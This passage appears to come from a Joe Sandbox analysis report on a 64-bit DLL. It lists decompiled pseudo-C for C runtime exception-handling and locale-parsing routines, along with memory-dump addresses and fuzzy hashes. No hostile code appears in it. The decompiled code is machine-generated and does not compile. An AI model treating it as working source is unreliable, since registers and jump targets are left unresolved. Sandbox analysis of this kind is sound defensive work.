                                                                      0x18000bb3c
                                                                      0x18000bb3e
                                                                      0x18000bb41
                                                                      0x18000bb45
                                                                      0x18000bb48
                                                                      0x18000bb4a
                                                                      0x18000bb52
                                                                      0x18000bb5d
                                                                      0x18000bb65
                                                                      0x18000bb69
                                                                      0x18000bb6e
                                                                      0x18000bb72
                                                                      0x18000bb81
                                                                      0x18000bb89
                                                                      0x18000bb8c
                                                                      0x18000bb8f
                                                                      0x18000bba4

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: Name::operator+$Replicator::operator[]
                                                                      • String ID:
                                                                      • API String ID: 3863519203-0
                                                                      • Opcode ID: cb209c50d214fe0f12e947fe147be0334e88df030a8652fe7ab0139f49791e9c
                                                                      • Instruction ID: 32318da7a664b107cd4d90faf4f238971058910713432d3adced22f806a8a49f
                                                                      • Opcode Fuzzy Hash: cb209c50d214fe0f12e947fe147be0334e88df030a8652fe7ab0139f49791e9c
                                                                      • Instruction Fuzzy Hash: 0A411972A00B589AF752CF68D8413EC77B0F348B89F54C415EA4997799DF78CA89C710
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 142388799-0
                                                                      • Opcode ID: 65381bc8b7ea58d450336793ec8bb37964537b8f60f6d57629bed186655c64e2
                                                                      • Instruction ID: b3f6badf230eb9c139b8ca524703726da410a5971ac8c5e3e596eec7f75b7ea6
                                                                      • Opcode Fuzzy Hash: 65381bc8b7ea58d450336793ec8bb37964537b8f60f6d57629bed186655c64e2
                                                                      • Instruction Fuzzy Hash: 6A21B671714A5881EBA18B25E8503AD7BA1F38CFE4F548312FEA957BE4CF39C6598700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: FilePointer$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 142388799-0
                                                                      • Opcode ID: 28bb86ed7eeb8a8a7f188ab0f6f9a19688226dbfaaf30c199adf610a89c8e5a6
                                                                      • Instruction ID: 74fd96d20431e6722dc0f76d50136617e3ca754d2706ebee416c768156fad0a2
                                                                      • Opcode Fuzzy Hash: 28bb86ed7eeb8a8a7f188ab0f6f9a19688226dbfaaf30c199adf610a89c8e5a6
                                                                      • Instruction Fuzzy Hash: F8118236714A5882E7A18B25E40039EB7A0F74CFD4F548222FE5967BA4CF39CA48CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 74%
                                                                      			E0000000118001174C(void* __ecx, void* __edx, void* __rax, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rsi, void* __r8, void* __r9) {
                                                                      				void* __rdi;
                                                                      				void* __r14;
                                                                      				void* _t73;
                                                                      				intOrPtr _t78;
                                                                      				unsigned int _t105;
                                                                      				void* _t132;
                                                                      				intOrPtr _t136;
                                                                      				intOrPtr* _t141;
                                                                      				signed char* _t145;
                                                                      				void* _t146;
                                                                      				void* _t170;
                                                                      				signed char* _t171;
                                                                      				long long _t175;
                                                                      				void* _t176;
                                                                      				void* _t178;
                                                                      				void* _t179;
                                                                      				void* _t194;
                                                                      				void* _t195;
                                                                      				void* _t197;
                                                                      
                                                                      				_t188 = __r9;
                                                                      				_t132 = __rax;
                                                                      				 *((long long*)(_t178 + 8)) = __rbx;
                                                                      				 *((long long*)(_t178 + 0x10)) = _t175;
                                                                      				 *((long long*)(_t178 + 0x18)) = __rsi;
                                                                      				_t179 = _t178 - 0x80;
                                                                      				_t141 = __rcx;
                                                                      				_t176 = __r9;
                                                                      				_t195 = __rdx;
                                                                      				E0000000118000525C(_t73, __r8);
                                                                      				E0000000118000E0F4(_t132);
                                                                      				_t171 =  *((intOrPtr*)(_t179 + 0xc0));
                                                                      				r8d = 0x80000029;
                                                                      				r9d = 0x80000026;
                                                                      				if ( *((intOrPtr*)(_t132 + 0x40)) != 0) goto 0x800117c6;
                                                                      				if ( *__rcx == 0xe06d7363) goto 0x800117c6;
                                                                      				if ( *__rcx != r8d) goto 0x800117b8;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x800117bd;
                                                                      				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0x800117c6;
                                                                      				if ( *__rcx == r9d) goto 0x800117c6;
                                                                      				if (( *_t171 & 0x00000020) != 0) goto 0x800119b8;
                                                                      				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x800118ea;
                                                                      				if (_t171[8] == 0) goto 0x800119b8;
                                                                      				if ( *(_t171[8] +  *((intOrPtr*)(__r9 + 8)) -  *((char*)(__r8 + 0x18005f7b0)) - 4) >>  *(__r8 + 0x18005f7c0) == 0) goto 0x800119b8;
                                                                      				if ( *((intOrPtr*)(_t179 + 0xc8)) != 0) goto 0x800119b8;
                                                                      				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x800118d7;
                                                                      				if ( *__rcx != r9d) goto 0x8001188e;
                                                                      				_t145 = _t171;
                                                                      				_t78 = E0000000118000FB90(__edx, __rcx, _t145, __r9, _t171, __rsi,  *((intOrPtr*)(__r9 + 0x20)), _t195, _t197, _t194);
                                                                      				r9d = _t78;
                                                                      				if (_t78 - 0xffffffff < 0) goto 0x800119da;
                                                                      				if (_t171[8] == 0) goto 0x80011872;
                                                                      				_t105 =  *(_t171[8] +  *((intOrPtr*)(_t176 + 8)) - _t145[0x18005f7b0] - 4) >> _t145[0x18005f7c0];
                                                                      				if (r9d - _t105 >= 0) goto 0x800119da;
                                                                      				_t146 = _t195;
                                                                      				E00000001180012670(_t145[0x18005f7c0], _t146, _t176, _t171, _t188);
                                                                      				goto 0x800119b8;
                                                                      				if ( *__rcx != r8d) goto 0x800118d7;
                                                                      				r9d =  *((intOrPtr*)(__rcx + 0x38));
                                                                      				if (r9d - 0xffffffff < 0) goto 0x800119da;
                                                                      				if (r9d -  *(_t171[8] +  *((intOrPtr*)(_t176 + 8)) -  *((char*)(_t146 + 0x18005f7b0)) - 4) >>  *(_t146 + 0x18005f7c0) >= 0) goto 0x800119da;
                                                                      				goto 0x8001187e;
                                                                      				E0000000118000E938( *((char*)(_t146 + 0x18005f7b0)), _t195, _t171);
                                                                      				goto 0x800119b8;
                                                                      				E00000001180011A88(_t179 + 0x50, _t171,  *((intOrPtr*)(_t176 + 8)));
                                                                      				if ( *((intOrPtr*)(_t179 + 0x50)) != _t105) goto 0x8001190a;
                                                                      				if (( *_t171 & 0x00000040) == 0) goto 0x800119b8;
                                                                      				if ( *_t141 != 0xe06d7363) goto 0x8001197f;
                                                                      				if ( *((intOrPtr*)(_t141 + 0x18)) - 3 < 0) goto 0x8001197f;
                                                                      				if ( *((intOrPtr*)(_t141 + 0x20)) - 0x19930522 <= 0) goto 0x8001197f;
                                                                      				_t136 =  *((intOrPtr*)(_t141 + 0x30));
                                                                      				if ( *((intOrPtr*)(_t136 + 8)) == _t105) goto 0x8001197f;
                                                                      				E0000000118000F1F0(_t136);
                                                                      				if (_t136 +  *((intOrPtr*)( *((intOrPtr*)(_t141 + 0x30)) + 8)) == 0) goto 0x8001197f;
                                                                      				 *(_t179 + 0x38) =  *(_t179 + 0xd8) & 0x000000ff;
                                                                      				 *((long long*)(_t179 + 0x30)) =  *((intOrPtr*)(_t179 + 0xd0));
                                                                      				 *((intOrPtr*)(_t179 + 0x28)) =  *((intOrPtr*)(_t179 + 0xc8));
                                                                      				 *(_t179 + 0x20) = _t171;
                                                                      				 *0x8005d348(_t170);
                                                                      				goto 0x800119bd;
                                                                      				 *(_t179 + 0x38) =  *((intOrPtr*)(_t179 + 0xd0));
                                                                      				 *((intOrPtr*)(_t179 + 0x30)) =  *((intOrPtr*)(_t179 + 0xc8));
                                                                      				 *((char*)(_t179 + 0x28)) =  *(_t179 + 0xd8);
                                                                      				 *(_t179 + 0x20) = _t171;
                                                                      				E0000000118001088C( *((intOrPtr*)(_t179 + 0xc8)), _t141, _t195, 0x180000000, _t176);
                                                                      				return 1;
                                                                      			}






















                                                                      0x18001174c
                                                                      0x18001174c
                                                                      0x18001174c
                                                                      0x180011751
                                                                      0x180011756
                                                                      0x180011760
                                                                      0x180011767
                                                                      0x18001176a
                                                                      0x180011773
                                                                      0x180011776
                                                                      0x18001177b
                                                                      0x180011780
                                                                      0x18001178a
                                                                      0x180011790
                                                                      0x180011799
                                                                      0x1800117a1
                                                                      0x1800117a6
                                                                      0x1800117ac
                                                                      0x1800117b6
                                                                      0x1800117bb
                                                                      0x1800117c0
                                                                      0x1800117ca
                                                                      0x1800117d3
                                                                      0x180011809
                                                                      0x180011816
                                                                      0x180011820
                                                                      0x180011829
                                                                      0x180011832
                                                                      0x180011835
                                                                      0x18001183a
                                                                      0x180011840
                                                                      0x180011849
                                                                      0x180011870
                                                                      0x180011875
                                                                      0x18001187b
                                                                      0x180011884
                                                                      0x180011889
                                                                      0x180011891
                                                                      0x180011893
                                                                      0x18001189b
                                                                      0x1800118cb
                                                                      0x1800118d5
                                                                      0x1800118e0
                                                                      0x1800118e5
                                                                      0x1800118f6
                                                                      0x1800118ff
                                                                      0x180011904
                                                                      0x180011910
                                                                      0x180011916
                                                                      0x18001191f
                                                                      0x180011921
                                                                      0x180011928
                                                                      0x18001192a
                                                                      0x18001193d
                                                                      0x18001194a
                                                                      0x18001195c
                                                                      0x18001196b
                                                                      0x180011972
                                                                      0x180011977
                                                                      0x18001197d
                                                                      0x18001198a
                                                                      0x18001199c
                                                                      0x1800119aa
                                                                      0x1800119ae
                                                                      0x1800119b3
                                                                      0x1800119d9

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: __except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 1467352782-3733052814
                                                                      • Opcode ID: 373c4ff32006f405e32e055d8b6f2619f571f0cf453da1129798ca4fbea12a55
                                                                      • Instruction ID: 7f702438e2d23d1bd8d9ce336aa35ccf7ec863af3e426fa4057b24c86c77a645
                                                                      • Opcode Fuzzy Hash: 373c4ff32006f405e32e055d8b6f2619f571f0cf453da1129798ca4fbea12a55
                                                                      • Instruction Fuzzy Hash: 6871A332108A888ADBAA8F25D4507ED7BA0F709FC6F14C216FE9847B85CF38C655C741
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 89%
                                                                      			E0000000118003DDC4(signed long long __rax, long long __rbx, void* __rcx, short* __rdx, long long __rsi, void* __r8) {
                                                                      				void* _t18;
                                                                      				signed int _t24;
                                                                      				void* _t32;
                                                                      				signed int _t34;
                                                                      				signed long long _t55;
                                                                      				void* _t68;
                                                                      				long long _t72;
                                                                      				void* _t75;
                                                                      				void* _t82;
                                                                      				void* _t85;
                                                                      				signed short* _t86;
                                                                      				void* _t88;
                                                                      
                                                                      				_t70 = __rsi;
                                                                      				_t66 = __rdx;
                                                                      				_t55 = __rax;
                                                                      				 *((long long*)(_t75 + 8)) = __rbx;
                                                                      				 *((long long*)(_t75 + 0x10)) = _t72;
                                                                      				 *((long long*)(_t75 + 0x18)) = __rsi;
                                                                      				_t57 = __rdx;
                                                                      				r8d = 0x1ca;
                                                                      				E000000011800046A0(_t18, 0, __rcx, __rdx, __r8);
                                                                      				r15d = 0;
                                                                      				if ( *((intOrPtr*)(__rdx)) != r15w) goto 0x8003ddff;
                                                                      				goto 0x8003defc;
                                                                      				if ( *__rdx != 0x2e) goto 0x8003de36;
                                                                      				_t4 = _t57 + 2; // 0x2
                                                                      				if ( *_t4 == r15w) goto 0x8003de36;
                                                                      				_t6 = _t66 - 1; // 0xf
                                                                      				r9d = _t6;
                                                                      				if (E0000000118004B224(_t55, __rdx, __rcx + 0x100, __rdx, __rsi, _t4, _t82, _t88) != 0) goto 0x8003df15;
                                                                      				 *((intOrPtr*)(__rcx + 0x11e)) = r15w;
                                                                      				goto 0x8003ddf8;
                                                                      				goto 0x8003dee1;
                                                                      				_t86 = __rdx + _t55 * 2;
                                                                      				_t34 =  *_t86 & 0x0000ffff;
                                                                      				if (r15d != 0) goto 0x8003de7a;
                                                                      				if (_t55 - 0x40 >= 0) goto 0x8003def9;
                                                                      				if (E0000000118004B224(_t55, __rdx, __rcx, __rdx, _t70, __rdx, _t55, _t85) != 0) goto 0x8003df15;
                                                                      				_t32 = r15d;
                                                                      				dil = _t34 == 0x2e;
                                                                      				goto 0x8003dec8;
                                                                      				if (_t32 != 1) goto 0x8003de97;
                                                                      				if (_t55 - 0x40 >= 0) goto 0x8003def9;
                                                                      				if (_t34 == 0x5f) goto 0x8003def9;
                                                                      				goto 0x8003deb9;
                                                                      				if (_t32 != 2) goto 0x8003def9;
                                                                      				if (_t55 - 0x10 >= 0) goto 0x8003def9;
                                                                      				if (_t34 == 0) goto 0x8003dead;
                                                                      				if (_t34 != 0x2c) goto 0x8003def9;
                                                                      				if (E0000000118004B224(_t55, __rdx, __rcx + 0x100, __rdx, _t70, __rdx, _t55, _t68) != 0) goto 0x8003df15;
                                                                      				if (_t34 == 0x2c) goto 0x8003ddf8;
                                                                      				if (_t34 == 0) goto 0x8003ddf8;
                                                                      				_t14 =  &(_t86[1]); // 0x2
                                                                      				_t24 = E0000000118004B320(_t23, _t14, 0x80060348);
                                                                      				if (_t55 != 0) goto 0x8003de3e;
                                                                      				return _t24 | 0xffffffff;
                                                                      			}















                                                                      0x18003ddc4
                                                                      0x18003ddc4
                                                                      0x18003ddc4
                                                                      0x18003ddc4
                                                                      0x18003ddc9
                                                                      0x18003ddce
                                                                      0x18003dddc
                                                                      0x18003dddf
                                                                      0x18003ddea
                                                                      0x18003ddef
                                                                      0x18003ddf6
                                                                      0x18003ddfa
                                                                      0x18003de03
                                                                      0x18003de05
                                                                      0x18003de0d
                                                                      0x18003de1b
                                                                      0x18003de1b
                                                                      0x18003de26
                                                                      0x18003de2c
                                                                      0x18003de34
                                                                      0x18003de39
                                                                      0x18003de3e
                                                                      0x18003de42
                                                                      0x18003de48
                                                                      0x18003de4e
                                                                      0x18003de67
                                                                      0x18003de71
                                                                      0x18003de74
                                                                      0x18003de78
                                                                      0x18003de7d
                                                                      0x18003de83
                                                                      0x18003de89
                                                                      0x18003de95
                                                                      0x18003de9a
                                                                      0x18003dea0
                                                                      0x18003dea5
                                                                      0x18003deab
                                                                      0x18003dec6
                                                                      0x18003decc
                                                                      0x18003ded5
                                                                      0x18003dedb
                                                                      0x18003deeb
                                                                      0x18003def3
                                                                      0x18003df14

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: .$_.,
                                                                      • API String ID: 3215553584-3384562259
                                                                      • Opcode ID: 4d8bcfe4480d005e7aa4260d517e56eb5084060cc45069d02f5d5adcb9eedff8
                                                                      • Instruction ID: 1e1967def1baf4648beee6b221c71894a50d0e9fe4394b6791fc51c6372109b1
                                                                      • Opcode Fuzzy Hash: 4d8bcfe4480d005e7aa4260d517e56eb5084060cc45069d02f5d5adcb9eedff8
                                                                      • Instruction Fuzzy Hash: EC41E27220064C86EBF79B25A8817EF2790A75C7E0F56C626FA594B6C1DF70CB9D8301
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 65%
                                                                      			E00000001180012054(void* __ecx, void* __eflags, void* __rcx, intOrPtr _a8, intOrPtr _a16, signed int _a24, void* _a32) {
                                                                      				char _v80;
                                                                      				signed long long _v96;
                                                                      				long long _v104;
                                                                      				long long _v136;
                                                                      				signed long long _v144;
                                                                      				signed int _v152;
                                                                      				long long _v160;
                                                                      				long long _v168;
                                                                      				signed long long _v176;
                                                                      				signed int _v184;
                                                                      				void* __rbx;
                                                                      				void* _t105;
                                                                      				void* _t125;
                                                                      				long long _t126;
                                                                      				signed long long _t130;
                                                                      				signed int _t131;
                                                                      				long long _t133;
                                                                      				signed long long _t135;
                                                                      				long long _t154;
                                                                      				intOrPtr* _t155;
                                                                      				void* _t156;
                                                                      				void* _t159;
                                                                      				signed long long _t162;
                                                                      
                                                                      				_t125 = _t156;
                                                                      				r12d = 0;
                                                                      				_v184 = r12d;
                                                                      				_a24 = _a24 & r12d;
                                                                      				_v176 = _v176 & _t162;
                                                                      				_v152 = _v152 & _t162;
                                                                      				 *((intOrPtr*)(_t125 - 0x80)) = r12b;
                                                                      				 *(_t125 - 0x7c) =  *(_t125 - 0x7c) & r12d;
                                                                      				 *(_t125 - 0x78) =  *(_t125 - 0x78) & r12d;
                                                                      				 *(_t125 - 0x74) =  *(_t125 - 0x74) & r12d;
                                                                      				 *(_t125 - 0x70) =  *(_t125 - 0x70) & r12d;
                                                                      				 *(_t125 - 0x6c) =  *(_t125 - 0x6c) & r12d;
                                                                      				E0000000118000E0F4(_t125);
                                                                      				_t126 =  *((intOrPtr*)(_t125 + 0x28));
                                                                      				_v160 = _t126;
                                                                      				E0000000118000E0F4(_t126);
                                                                      				_v168 =  *((intOrPtr*)(_t126 + 0x20));
                                                                      				_t154 =  *((intOrPtr*)(__rcx + 0x50));
                                                                      				_a32 = _t154;
                                                                      				_t133 =  *((intOrPtr*)(__rcx + 0x40));
                                                                      				_v136 =  *((intOrPtr*)(__rcx + 0x30));
                                                                      				_v104 =  *((intOrPtr*)(__rcx + 0x48));
                                                                      				_t130 =  *((intOrPtr*)(__rcx + 0x68));
                                                                      				_v96 = _t130;
                                                                      				_a16 =  *((intOrPtr*)(__rcx + 0x78));
                                                                      				_a8 =  *((intOrPtr*)(__rcx + 0x38));
                                                                      				E0000000118000525C( *((intOrPtr*)(__rcx + 0x38)), _t133);
                                                                      				E0000000118000E0F4(_t130);
                                                                      				 *((long long*)(_t130 + 0x20)) = _t154;
                                                                      				E0000000118000E0F4(_t130);
                                                                      				 *((long long*)(_t130 + 0x28)) = _t133;
                                                                      				E0000000118000E0F4(_t130);
                                                                      				E0000000118000F14C(_t130,  &_v80,  *((intOrPtr*)( *((intOrPtr*)(_t130 + 0x20)) + 0x28)));
                                                                      				_v144 = _t130;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x58)) == _t162) goto 0x80012156;
                                                                      				_a24 = 1;
                                                                      				E0000000118000E0F4(_t130);
                                                                      				_v152 =  *((intOrPtr*)(_t130 + 0x70));
                                                                      				r8d = 0x100;
                                                                      				E000000011800130F0(_v136,  *((intOrPtr*)(__rcx + 0x28)), _t159);
                                                                      				_v176 = _t130;
                                                                      				if (_t130 - 2 >= 0) goto 0x8001218a;
                                                                      				_t135 =  *((intOrPtr*)(_t156 - 0xa8 + 0x70 + _t130 * 8));
                                                                      				if (_t135 == 0) goto 0x8001229d;
                                                                      				_v176 = _t135;
                                                                      				E00000001180013120(_t135,  *((intOrPtr*)(__rcx + 0x28)));
                                                                      				_v184 = 1;
                                                                      				E0000000118000E0F4(_t130);
                                                                      				 *(_t130 + 0x40) =  *(_t130 + 0x40) & 0x00000000;
                                                                      				E0000000118000E0F4(_t130);
                                                                      				 *((intOrPtr*)(_t130 + 0x78)) = _a16;
                                                                      				_t155 = _a32;
                                                                      				if (_a24 == 0) goto 0x800121f1;
                                                                      				E00000001180004F28(1, _t155);
                                                                      				_t131 = _v152;
                                                                      				r8d =  *((intOrPtr*)(_t131 + 0x18));
                                                                      				goto 0x800121fe;
                                                                      				r8d =  *((intOrPtr*)(_t155 + 0x18));
                                                                      				RaiseException(??, ??, ??, ??);
                                                                      				r12d = _v184;
                                                                      				E0000000118000F188(_t131, _v176, _v144);
                                                                      				if (r12d != 0) goto 0x8001225c;
                                                                      				if ( *_t155 != 0xe06d7363) goto 0x8001225c;
                                                                      				if ( *((intOrPtr*)(_t155 + 0x18)) != 4) goto 0x8001225c;
                                                                      				if ( *((intOrPtr*)(_t155 + 0x20)) - 0x19930520 - 2 > 0) goto 0x8001225c;
                                                                      				if (E00000001180004FFC(_t131,  *((intOrPtr*)(_t155 + 0x28))) == 0) goto 0x8001225c;
                                                                      				E00000001180004F28(1, _t155);
                                                                      				E0000000118000E0F4(_t131);
                                                                      				 *((long long*)(_t131 + 0x20)) = _v168;
                                                                      				E0000000118000E0F4(_t131);
                                                                      				 *((long long*)(_t131 + 0x28)) = _v160;
                                                                      				E0000000118000E0F4(_t131);
                                                                      				 *((intOrPtr*)(_t131 + 0x78)) = _a8;
                                                                      				_t105 = E0000000118000E0F4(_t131);
                                                                      				 *((intOrPtr*)(_t131 + 0x78)) = 0xfffffffe;
                                                                      				return _t105;
                                                                      			}


























                                                                      0x180012054
                                                                      0x18001206a
                                                                      0x18001206d
                                                                      0x180012072
                                                                      0x18001207a
                                                                      0x18001207f
                                                                      0x180012084
                                                                      0x180012088
                                                                      0x18001208c
                                                                      0x180012090
                                                                      0x180012094
                                                                      0x180012098
                                                                      0x18001209c
                                                                      0x1800120a1
                                                                      0x1800120a5
                                                                      0x1800120aa
                                                                      0x1800120b3
                                                                      0x1800120b8
                                                                      0x1800120bc
                                                                      0x1800120c4
                                                                      0x1800120cc
                                                                      0x1800120d9
                                                                      0x1800120de
                                                                      0x1800120e2
                                                                      0x1800120ea
                                                                      0x1800120f4
                                                                      0x1800120fe
                                                                      0x180012103
                                                                      0x180012108
                                                                      0x18001210c
                                                                      0x180012111
                                                                      0x180012115
                                                                      0x18001212a
                                                                      0x180012132
                                                                      0x18001213b
                                                                      0x18001213d
                                                                      0x180012148
                                                                      0x180012151
                                                                      0x180012156
                                                                      0x180012164
                                                                      0x18001216c
                                                                      0x180012175
                                                                      0x180012177
                                                                      0x18001217f
                                                                      0x180012185
                                                                      0x180012190
                                                                      0x1800121a1
                                                                      0x1800121a9
                                                                      0x1800121ae
                                                                      0x1800121b2
                                                                      0x1800121be
                                                                      0x1800121c1
                                                                      0x1800121d1
                                                                      0x1800121d8
                                                                      0x1800121dd
                                                                      0x1800121e6
                                                                      0x1800121ef
                                                                      0x1800121f5
                                                                      0x1800121fe
                                                                      0x180012204
                                                                      0x180012220
                                                                      0x180012228
                                                                      0x180012230
                                                                      0x180012236
                                                                      0x180012243
                                                                      0x180012250
                                                                      0x180012257
                                                                      0x18001225c
                                                                      0x180012261
                                                                      0x180012265
                                                                      0x18001226a
                                                                      0x18001226e
                                                                      0x18001227a
                                                                      0x18001227d
                                                                      0x180012282
                                                                      0x18001229c

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000000.00000002.487849511.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487904903.000000018005D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487919688.0000000180070000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.487931275.0000000180073000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000000.00000002.488057884.00000001800D5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_180000000_loaddll64.jbxd
                                                                      Similarity
                                                                      • API ID: CreateFrameInfo__except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 2558813199-1018135373
                                                                      • Opcode ID: 2f7cc0fb9988d89437276d29073ca030c043fb3a0ce298cfcca1defadeeb60dc
                                                                      • Instruction ID: ec1bb941499022fd6ae13348708c34666f64ee06683b9661c2c7995ede0d17b7
                                                                      • Opcode Fuzzy Hash: 2f7cc0fb9988d89437276d29073ca030c043fb3a0ce298cfcca1defadeeb60dc
                                                                      • Instruction Fuzzy Hash: A5514A32218B9896EAB1EB19E44039E77B4F38DBD0F148124EF9947B55DF38C5A5CB01
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 64%
                                                                      			E0000000118004F180(signed int __edx, void* __eflags, intOrPtr* __rcx, void* __rdx, void* __r10) {
                                                                      				char _v500;
                                                                      				intOrPtr _v504;
                                                                      				void* __rsi;
                                                                      				void* _t23;
                                                                      				void* _t24;
                                                                      				void* _t28;
                                                                      				void* _t33;
                                                                      
                                                                      				r10d = __edx;
                                                                      				r9d = 0x20;
                                                                      				r10d = r10d >> 5;
                                                                      				r14d = r9d;
                                                                      				r14d = r14d - (__edx & 0x0000001f);
                                                                      				r12d = 0;
                                                                      				r15d = 0;
                                                                      				asm("inc ecx");
                                                                      				r15d =  !r15d;
                                                                      				if (__eflags == 0) goto 0x8004f1d3;
                                                                      				goto 0x8004f1d6;
                                                                      				if (__rdx + __r10 - 0x73 <= 0) goto 0x8004f20f;
                                                                      				 *__rcx = r12d;
                                                                      				_v504 = r12d;
                                                                      				r9d = 0;
                                                                      				E0000000118005053C(_t23, _t24, __rcx + 4, __rdx, _t28,  &_v500, _t33);
                                                                      				return 0;
                                                                      			}










                                                                      0x18004f198
                                                                      0x18004f19b
                                                                      0x18004f1a1
                                                                      0x18004f1a5
                                                                      0x18004f1b0
                                                                      0x18004f1b6
                                                                      0x18004f1c1
                                                                      0x18004f1c4
                                                                      0x18004f1ca
                                                                      0x18004f1cd
                                                                      0x18004f1d1
                                                                      0x18004f1dd
                                                                      0x18004f1df
                                                                      0x18004f1eb
                                                                      0x18004f1f0
                                                                      0x18004f1f8
                                                                      0x18004f20e

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.487855728.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
